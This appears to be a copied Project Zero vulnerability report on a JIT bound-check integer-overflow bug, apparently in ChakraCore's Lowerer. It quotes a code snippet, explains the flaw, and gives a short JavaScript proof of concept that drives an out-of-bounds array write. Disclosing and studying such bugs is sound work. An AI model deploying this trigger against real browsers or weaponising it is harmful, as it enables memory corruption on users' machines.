37 lines
No EOL
960 B
JavaScript
37 lines
No EOL
960 B
JavaScript
/*
|
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1343
|
|
|
|
Here's a snippet of the method.
|
|
void Lowerer::LowerBoundCheck(IR::Instr *const instr)
|
|
{
|
|
...
|
|
if(rightOpnd->IsIntConstOpnd())
|
|
{
|
|
IntConstType newOffset;
|
|
if(!IntConstMath::Add(offset, rightOpnd->AsIntConstOpnd()->GetValue(), &newOffset)) <<--- (a)
|
|
{
|
|
offset = newOffset;
|
|
rightOpnd = nullptr;
|
|
offsetOpnd = nullptr;
|
|
}
|
|
}
|
|
...
|
|
if(!rightOpnd)
|
|
{
|
|
rightOpnd = IR::IntConstOpnd::New(offset, TyInt32, func);
|
|
}
|
|
}
|
|
|
|
At (a), it uses "IntConstMath::Add" to check integer overflow. But the size of IntConstType equals to the size of pointer, and the "offset" variable is used as a 32-bit integer. So it may fail to check integer overflow on 64-bit system.
|
|
|
|
PoC:
|
|
*/
|
|
|
|
function f() {
|
|
let arr = new Uint32Array(0x1000);
|
|
for (let i = 0; i < 0x7fffffff;) {
|
|
arr[++i] = 0x1234;
|
|
}
|
|
}
|
|
|
|
f(); |